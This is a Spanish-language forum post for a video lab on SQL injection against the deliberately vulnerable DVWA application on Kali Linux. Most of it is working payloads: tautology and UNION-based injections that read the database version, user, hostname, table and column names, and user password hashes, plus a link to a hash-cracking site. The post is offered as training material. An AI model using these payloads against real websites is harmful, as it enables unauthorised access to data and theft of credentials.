LAB | SQL INJECTION | Kali Linux Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

LAB | SQL INJECTION | Kali Linux Seguridad Informática

#1

Mensaje por admin »

Este video explicará la inyección SQL, el impacto de los ataques SQL exitosos, ejemplos de técnicas de inyección SQL y cómo prevenir la inyección SQL. Disclaimer / Descargo de responsabilidad: este canal es estrictamente educativo para aprender sobre ciberseguridad

Imagen
 
LABORATORIO o TESTEO de PRUEBA
Imagen Sentencias o consultas o comandos usados en el video

Código: Seleccionar todo

Acceder a base de datos via cli

sudo mysql -u root -p

USE dvwa;

SELECT first_name, last_name FROM users WHERE user_id = '2';

SELECT * FROM users WHERE first_name='Gordon'; -- ' AND password='1111'

------------------------

Ejemplos de obtencion de datos

A - Se obtienen datos del usuario

1  

Tambien modificando la url se puede obtener
datos del usuario

http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

SELECT first_name, last_name FROM users WHERE user_id = '3';

B - Obtener toda la info de una tabla

%' or '1'='1


SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';


C - Obtener la version de la base de datos

%' or 0=0 union select null, version() #

test'union select null, version()#



D - Display el usuario de la base de datos. Con que usuario
el lenguaje de programacion hace las consultas a la base de datos

%' or 0=0 union select null, user() #

test'union select null, user()#


E - Mirar el nombre la base de datos donde estan todas las tablas

%' or 0=0 union select null, database() #
test' union select null, database() #

F  -  Listar todas las tablas que tiene la base de datos

%' and 1=0 union select null, table_name from information_schema.tables #
test' and 1=0 union select null, table_name from information_schema.tables #


G - Display el hostname donde esta alojada la base de datos

' union select null, @@hostname#


H- Todas las columnas de una tabla

test' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #


I - Mostrar el contenido de las columans

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
LINKS o ENLACES

https://softwarelab.org/es/que-es-inyeccion-sql/
https://byte-mind.net/sql-injection-tip ... ramedidas/
https://www.golinuxcloud.com/install-dvwa-kali-linux/
https://nooblinux.com/sql-injection-exp ... sing-dvwa/
https://crackstation.net/
https://stackoverflow.com/questions/528 ... hrough-cli
https://www.f5.com/es_es/services/resou ... n-firewall
https://crackstation.net/

VIDEO TUTORIAL




Pentesting synology xpenology Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell PMKID EAPOL Handshake backdoor LAN | Local Area Network CMD execution RFI LFI How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Macro Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking PowerPoint Access Recuperar contraseña Advanced password recovery DCOM7 Hash wpa wpa2 wpa3 cifrado descrifrar PSK instalacion install Mysql Install DVWA on Kali Linux Step-by-Step Damn Vulnerable Web Application Download o bajar database apache base de datos Cross-Site Request Forgery (CSRF) File Inclusion SQL injection Bruteforce attacks Vulnerabilidades CVE XAMPP Perl MariaDB SQL Injection Exploitation Explanation Examples Using DVWA ¿Qué es inyección SQL? ¿Qué tipos de ataques de inyección SQL Existen? Ejemplos de ataques de inyección SQL Cómo prevenir ataques de inyección SQL Obtener información de la base de datos web application firewall sql mysql queries sentencias consultas oracle macropack,Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,como usar kali linux,comandos,commands,remote function,metasploit,laboratorio,lab,testing,web developers,desarrollador,vulnerabilities
 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 6 invitados